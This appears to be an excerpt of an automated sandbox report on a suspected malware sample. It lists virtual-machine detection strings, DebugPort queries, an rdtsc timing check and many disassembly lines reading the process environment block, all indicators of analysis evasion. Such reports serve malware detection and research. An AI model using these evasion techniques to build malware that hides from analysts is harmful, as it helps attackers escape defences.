Source: explorer.exe, 00000006.00000002.3839674348.00000000088FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000006.00000000.1355837876.0000000000A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe

Code function: 5_2_00409AB0 rdtsc

5_2_00409AB0

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe

Code function: 5_2_0040ACF0 LdrLoadDll,

5_2_0040ACF0

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017B8158 mov eax, dword ptr fs:[00000030h]	5_2_017B8158
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01726154 mov eax, dword ptr fs:[00000030h]	5_2_01726154
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01726154 mov eax, dword ptr fs:[00000030h]	5_2_01726154
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0171C156 mov eax, dword ptr fs:[00000030h]	5_2_0171C156
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017B4144 mov eax, dword ptr fs:[00000030h]	5_2_017B4144
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017B4144 mov eax, dword ptr fs:[00000030h]	5_2_017B4144
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017B4144 mov ecx, dword ptr fs:[00000030h]	5_2_017B4144
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017B4144 mov eax, dword ptr fs:[00000030h]	5_2_017B4144
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017B4144 mov eax, dword ptr fs:[00000030h]	5_2_017B4144
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01750124 mov eax, dword ptr fs:[00000030h]	5_2_01750124
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CA118 mov ecx, dword ptr fs:[00000030h]	5_2_017CA118
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CA118 mov eax, dword ptr fs:[00000030h]	5_2_017CA118
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CA118 mov eax, dword ptr fs:[00000030h]	5_2_017CA118
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CA118 mov eax, dword ptr fs:[00000030h]	5_2_017CA118
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017E0115 mov eax, dword ptr fs:[00000030h]	5_2_017E0115
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]	5_2_017CE10E
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CE10E mov ecx, dword ptr fs:[00000030h]	5_2_017CE10E
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]	5_2_017CE10E
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]	5_2_017CE10E
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CE10E mov ecx, dword ptr fs:[00000030h]	5_2_017CE10E
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]	5_2_017CE10E
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]	5_2_017CE10E
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CE10E mov ecx, dword ptr fs:[00000030h]	5_2_017CE10E
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]	5_2_017CE10E
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CE10E mov ecx, dword ptr fs:[00000030h]	5_2_017CE10E
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017501F8 mov eax, dword ptr fs:[00000030h]	5_2_017501F8
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017F61E5 mov eax, dword ptr fs:[00000030h]	5_2_017F61E5
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0179E1D0 mov eax, dword ptr fs:[00000030h]	5_2_0179E1D0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0179E1D0 mov eax, dword ptr fs:[00000030h]	5_2_0179E1D0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0179E1D0 mov ecx, dword ptr fs:[00000030h]	5_2_0179E1D0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0179E1D0 mov eax, dword ptr fs:[00000030h]	5_2_0179E1D0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0179E1D0 mov eax, dword ptr fs:[00000030h]	5_2_0179E1D0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017E61C3 mov eax, dword ptr fs:[00000030h]	5_2_017E61C3
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017E61C3 mov eax, dword ptr fs:[00000030h]	5_2_017E61C3
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A019F mov eax, dword ptr fs:[00000030h]	5_2_017A019F
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A019F mov eax, dword ptr fs:[00000030h]	5_2_017A019F
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A019F mov eax, dword ptr fs:[00000030h]	5_2_017A019F
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A019F mov eax, dword ptr fs:[00000030h]	5_2_017A019F
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0171A197 mov eax, dword ptr fs:[00000030h]	5_2_0171A197
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0171A197 mov eax, dword ptr fs:[00000030h]	5_2_0171A197
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0171A197 mov eax, dword ptr fs:[00000030h]	5_2_0171A197
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01760185 mov eax, dword ptr fs:[00000030h]	5_2_01760185
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017DC188 mov eax, dword ptr fs:[00000030h]	5_2_017DC188
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017DC188 mov eax, dword ptr fs:[00000030h]	5_2_017DC188
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017C4180 mov eax, dword ptr fs:[00000030h]	5_2_017C4180
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017C4180 mov eax, dword ptr fs:[00000030h]	5_2_017C4180
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0174C073 mov eax, dword ptr fs:[00000030h]	5_2_0174C073
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01722050 mov eax, dword ptr fs:[00000030h]	5_2_01722050
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A6050 mov eax, dword ptr fs:[00000030h]	5_2_017A6050
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017B6030 mov eax, dword ptr fs:[00000030h]	5_2_017B6030
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0171A020 mov eax, dword ptr fs:[00000030h]	5_2_0171A020
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0171C020 mov eax, dword ptr fs:[00000030h]	5_2_0171C020
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0173E016 mov eax, dword ptr fs:[00000030h]	5_2_0173E016
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0173E016 mov eax, dword ptr fs:[00000030h]	5_2_0173E016
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0173E016 mov eax, dword ptr fs:[00000030h]	5_2_0173E016
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0173E016 mov eax, dword ptr fs:[00000030h]	5_2_0173E016
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A4000 mov ecx, dword ptr fs:[00000030h]	5_2_017A4000
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]	5_2_017C2000
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]	5_2_017C2000
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]	5_2_017C2000
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]	5_2_017C2000
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]	5_2_017C2000
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]	5_2_017C2000
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]	5_2_017C2000
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]	5_2_017C2000
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0171C0F0 mov eax, dword ptr fs:[00000030h]	5_2_0171C0F0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017620F0 mov ecx, dword ptr fs:[00000030h]	5_2_017620F0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0171A0E3 mov ecx, dword ptr fs:[00000030h]	5_2_0171A0E3
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A60E0 mov eax, dword ptr fs:[00000030h]	5_2_017A60E0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017280E9 mov eax, dword ptr fs:[00000030h]	5_2_017280E9
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A20DE mov eax, dword ptr fs:[00000030h]	5_2_017A20DE
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017E60B8 mov eax, dword ptr fs:[00000030h]	5_2_017E60B8
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017E60B8 mov ecx, dword ptr fs:[00000030h]	5_2_017E60B8
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017B80A8 mov eax, dword ptr fs:[00000030h]	5_2_017B80A8
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172208A mov eax, dword ptr fs:[00000030h]	5_2_0172208A
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017C437C mov eax, dword ptr fs:[00000030h]	5_2_017C437C
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A035C mov eax, dword ptr fs:[00000030h]	5_2_017A035C
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A035C mov eax, dword ptr fs:[00000030h]	5_2_017A035C
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A035C mov eax, dword ptr fs:[00000030h]	5_2_017A035C
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A035C mov ecx, dword ptr fs:[00000030h]	5_2_017A035C
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A035C mov eax, dword ptr fs:[00000030h]	5_2_017A035C
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A035C mov eax, dword ptr fs:[00000030h]	5_2_017A035C
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017EA352 mov eax, dword ptr fs:[00000030h]	5_2_017EA352
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017C8350 mov ecx, dword ptr fs:[00000030h]	5_2_017C8350
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]	5_2_017A2349
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]	5_2_017A2349
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]	5_2_017A2349
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]	5_2_017A2349
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]	5_2_017A2349
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]	5_2_017A2349
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]	5_2_017A2349
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]	5_2_017A2349
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]	5_2_017A2349
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]	5_2_017A2349
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]	5_2_017A2349
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]	5_2_017A2349
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]	5_2_017A2349
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]	5_2_017A2349
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A2349 mov eax, dword ptr fs:[00000030h]	5_2_017A2349
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0171C310 mov ecx, dword ptr fs:[00000030h]	5_2_0171C310
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01740310 mov ecx, dword ptr fs:[00000030h]	5_2_01740310
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0175A30B mov eax, dword ptr fs:[00000030h]	5_2_0175A30B
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0175A30B mov eax, dword ptr fs:[00000030h]	5_2_0175A30B
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0175A30B mov eax, dword ptr fs:[00000030h]	5_2_0175A30B
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0173E3F0 mov eax, dword ptr fs:[00000030h]	5_2_0173E3F0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0173E3F0 mov eax, dword ptr fs:[00000030h]	5_2_0173E3F0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0173E3F0 mov eax, dword ptr fs:[00000030h]	5_2_0173E3F0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017563FF mov eax, dword ptr fs:[00000030h]	5_2_017563FF
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]	5_2_017303E9
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]	5_2_017303E9
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]	5_2_017303E9
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]	5_2_017303E9
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]	5_2_017303E9
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]	5_2_017303E9
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]	5_2_017303E9
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017303E9 mov eax, dword ptr fs:[00000030h]	5_2_017303E9
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CE3DB mov eax, dword ptr fs:[00000030h]	5_2_017CE3DB
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CE3DB mov eax, dword ptr fs:[00000030h]	5_2_017CE3DB
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CE3DB mov ecx, dword ptr fs:[00000030h]	5_2_017CE3DB
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CE3DB mov eax, dword ptr fs:[00000030h]	5_2_017CE3DB
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017C43D4 mov eax, dword ptr fs:[00000030h]	5_2_017C43D4
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017C43D4 mov eax, dword ptr fs:[00000030h]	5_2_017C43D4
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017DC3CD mov eax, dword ptr fs:[00000030h]	5_2_017DC3CD
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0172A3C0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0172A3C0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0172A3C0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0172A3C0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0172A3C0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0172A3C0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017283C0 mov eax, dword ptr fs:[00000030h]	5_2_017283C0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017283C0 mov eax, dword ptr fs:[00000030h]	5_2_017283C0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017283C0 mov eax, dword ptr fs:[00000030h]	5_2_017283C0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017283C0 mov eax, dword ptr fs:[00000030h]	5_2_017283C0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A63C0 mov eax, dword ptr fs:[00000030h]	5_2_017A63C0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01718397 mov eax, dword ptr fs:[00000030h]	5_2_01718397
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01718397 mov eax, dword ptr fs:[00000030h]	5_2_01718397
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01718397 mov eax, dword ptr fs:[00000030h]	5_2_01718397
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0171E388 mov eax, dword ptr fs:[00000030h]	5_2_0171E388
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0171E388 mov eax, dword ptr fs:[00000030h]	5_2_0171E388
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0171E388 mov eax, dword ptr fs:[00000030h]	5_2_0171E388
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0174438F mov eax, dword ptr fs:[00000030h]	5_2_0174438F
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0174438F mov eax, dword ptr fs:[00000030h]	5_2_0174438F
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]	5_2_017D0274
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]	5_2_017D0274
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]	5_2_017D0274
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]	5_2_017D0274
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]	5_2_017D0274
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]	5_2_017D0274
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]	5_2_017D0274
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]	5_2_017D0274
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]	5_2_017D0274
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]	5_2_017D0274
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]	5_2_017D0274
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]	5_2_017D0274
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01724260 mov eax, dword ptr fs:[00000030h]	5_2_01724260
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01724260 mov eax, dword ptr fs:[00000030h]	5_2_01724260
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01724260 mov eax, dword ptr fs:[00000030h]	5_2_01724260
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0171826B mov eax, dword ptr fs:[00000030h]	5_2_0171826B
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0171A250 mov eax, dword ptr fs:[00000030h]	5_2_0171A250
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01726259 mov eax, dword ptr fs:[00000030h]	5_2_01726259
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017DA250 mov eax, dword ptr fs:[00000030h]	5_2_017DA250
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017DA250 mov eax, dword ptr fs:[00000030h]	5_2_017DA250
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A8243 mov eax, dword ptr fs:[00000030h]	5_2_017A8243
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A8243 mov ecx, dword ptr fs:[00000030h]	5_2_017A8243
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0171823B mov eax, dword ptr fs:[00000030h]	5_2_0171823B
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017302E1 mov eax, dword ptr fs:[00000030h]	5_2_017302E1
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017302E1 mov eax, dword ptr fs:[00000030h]	5_2_017302E1
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017302E1 mov eax, dword ptr fs:[00000030h]	5_2_017302E1
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0172A2C3
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0172A2C3
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0172A2C3
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0172A2C3
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0172A2C3
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017302A0 mov eax, dword ptr fs:[00000030h]	5_2_017302A0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017302A0 mov eax, dword ptr fs:[00000030h]	5_2_017302A0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017B62A0 mov eax, dword ptr fs:[00000030h]	5_2_017B62A0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017B62A0 mov ecx, dword ptr fs:[00000030h]	5_2_017B62A0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017B62A0 mov eax, dword ptr fs:[00000030h]	5_2_017B62A0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017B62A0 mov eax, dword ptr fs:[00000030h]	5_2_017B62A0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017B62A0 mov eax, dword ptr fs:[00000030h]	5_2_017B62A0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017B62A0 mov eax, dword ptr fs:[00000030h]	5_2_017B62A0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0175E284 mov eax, dword ptr fs:[00000030h]	5_2_0175E284
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0175E284 mov eax, dword ptr fs:[00000030h]	5_2_0175E284
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A0283 mov eax, dword ptr fs:[00000030h]	5_2_017A0283
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A0283 mov eax, dword ptr fs:[00000030h]	5_2_017A0283
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017A0283 mov eax, dword ptr fs:[00000030h]	5_2_017A0283
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0175656A mov eax, dword ptr fs:[00000030h]	5_2_0175656A
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0175656A mov eax, dword ptr fs:[00000030h]	5_2_0175656A
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0175656A mov eax, dword ptr fs:[00000030h]	5_2_0175656A
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01728550 mov eax, dword ptr fs:[00000030h]	5_2_01728550
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01728550 mov eax, dword ptr fs:[00000030h]	5_2_01728550
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01730535 mov eax, dword ptr fs:[00000030h]	5_2_01730535
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01730535 mov eax, dword ptr fs:[00000030h]	5_2_01730535
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01730535 mov eax, dword ptr fs:[00000030h]	5_2_01730535
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01730535 mov eax, dword ptr fs:[00000030h]	5_2_01730535
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01730535 mov eax, dword ptr fs:[00000030h]	5_2_01730535
